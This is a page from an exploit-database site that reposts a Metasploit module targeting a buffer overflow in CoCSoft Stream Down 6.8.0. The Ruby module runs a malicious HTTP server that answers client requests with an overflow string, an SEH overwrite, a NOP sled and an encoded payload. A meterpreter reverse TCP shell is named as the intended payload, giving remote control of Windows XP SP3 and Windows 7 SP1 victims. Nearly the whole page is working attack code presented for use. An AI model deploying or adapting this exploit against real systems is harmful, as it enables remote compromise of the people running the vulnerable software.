CoCSoft Stream Down 6.8.0 Universal exploit metasploit

2011.12.28
Credit: metasploit
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # $Id: stream_down_BOF.rb 1 2011-12-18 $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer def initialize super( 'Name' => 'StreamDown Buffer over flow universal exploit', 'Version' => '$Revision: 1 $', 'Description' => 'Stream Down Buffer Overflow universal exploit tested against win xp sp3 and win7 sp1. Also note that the program will not crash in case of meterpreter reverse tcp payload but a session will be opened', 'Author' => 'Fady Mohamed Osman', 'References' => [ ['URL', 'http://www.dark-masters.tk/'] ], 'Privileged' => false, 'DefaultOptions' => { 'EXITFUNC' => 'seh', 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { 'BadChars' => "\x00\xff\x0a" }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'License' => MSF_LICENSE ) end def on_request_uri(cli,request) seh = 0x10019448 nseh = "\xeb\x06\x90\x90" sploit = "A"*16388 + nseh + [seh].pack('V') + "\x90"*10 + payload.encoded cli.put(sploit) close_client(cli) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top